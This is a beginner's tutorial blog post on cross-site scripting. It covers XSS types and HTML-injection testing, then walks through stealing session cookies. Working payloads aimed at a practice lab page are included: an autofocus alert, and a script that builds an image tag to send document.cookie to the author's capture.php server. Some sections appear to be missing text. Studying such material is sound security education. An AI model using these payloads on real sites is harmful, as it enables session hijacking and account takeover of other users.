Now, There are 3 Types of XSS
1. Reflected or Non-Persistent XSS:
2. Stored or Persistent XSS:
It Occurs in Places Where a Malicious User input Containing XSS Vector is stored or "saved". Thus It may (happens mostly..) cause Multiple User to be affected. Stored XSS could be in User's Name/Comments Section/Group Name/Status/TimeLine/Some Uploaded File Name ie. Some Functionalities/Inputs which could be shared with other Users too, causing multiple users to be affected.
3. DOM XSS:
NOTE: There's another Category of XSS Called as "Self-XSS" Which is a situation in Which you have Found an XSS Vulnerability (of any type of above listed Three) but it Could not be Shared With any User Except for their Own selves ie. it could not be used to Exploit any User. However, Under some circumstances, it is even possible to convert Self-XSS to an Exploitable One Which is also left for another Upcoming Tutorial.
So again, in this Tutorial We would be talking about "Very Basics of XSS", details regarding Finding XSS's and Different Contexts of XSS would be covered in depth in the next tutorial. First of all in any User Input Try Putting a Simple HTML Tag like <B>, <S>, <I>, <h1>.. etc to Confirm if you are able to inject HTML.
Some Examples could be(You could use any suitable Event Handler other than these):
http://leettime.net/xsslab1/chalg1.php?name=<input onfocus="alert(1)" autofocus>This will cause input Tag to execute alert when it is focused/selected and "autofocus" attribute focuses it automatically causing to Execute alert(1) without any user interaction and as such there could be such numerous examples.
Stealing User's Cookies
But When Shared with Victim, this will alert the cookies but on the Victim Side only. Let us Send These Cookies To Our Server/Website(https://securityidiots.com) by changing "location.href" property.
NOTE: Remember To URL Encode "+" to %2b in a GET Request otherwise it is treated a WhiteSpace
This will make Victim to Redirect to "https://securityidiots.com/?mycookies=.....Cookies here .....; UserSession=OIjieowjoiO130901933;" Thus sending Cookies as a parameter to Our Server and We Could Check them in Our Server Logs and Use them in Cookie Header To Access that User's Session on the Affected Website Without Authentication.
We Could also make a Simple PHP Script to Capture The Cookies and Save it in a File instead of Checking our Server Logs in case we don't have access.
Now Making a Request to this Script with cookies in mycookies parameter will Create a file "Cookies.txt" and Keep Saving and Appending all The Cookies To it.
However Since This redirects The Victim to Attacker's Page its noisy and We want our vector to be as stealthy as possible. We Could Use a Tag like Image Tag to send Cookies without redirection or any Major Changes on The Page so We can use document.createElement to Create an image tag and in "src" attribute of it we concatenate our Server with document.cookie and Add it to The DOM.
We can do it in following manner:
var imgtag = document.createElement("img");//creates img element
imgtag.src="http://securityidiots.com/capture.php?mycookies="+document.cookie;//adds attribute src to img element
document.body.appendChild(imgtag);//appends the created element to the body tag of the DOM
so it becomes
http://leettime.net/xsslab1/chalg1.php?name=<script>var x=new Image();x.src="http://securityidiots.com/capture.php?mycookies="+document['cookie'];document.body.appendChild(x);</script>
Now a GET Request would be sent to our server with Cookies of the Victim Stealthily.
You can also use document.write() to directly add write something to the page.
A Cookie has the following format:
Cookie: CookieName=CookieValue; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=example.com;Secure; HttpOnly
Cookies are separated by ';'
|"Expires":|| decides the time of cookie to expire, if you Enter a Time of Past it gets expired immediately|
|"Path":||decides Cookies should be available from Which Path of the Site|
|"Domain":|| Tells Which domain to send cookies to. If it is not specified its limited to the current domain otherwise if specified it applies to its subdomains too|
|"Secure":|| Specifies that Cookies should be sent only over HTTPS connection|
So, That's it for this Tutorial, I wanted people to Know How To Exploit a Very Basic XSS by Stealing User Cookies and In The Next Tutorial We would look at in-depth Finding XSS and Different Contexts of XSS. Stay Tuned!
Author : Rahul Maini
Date : 2017-05-27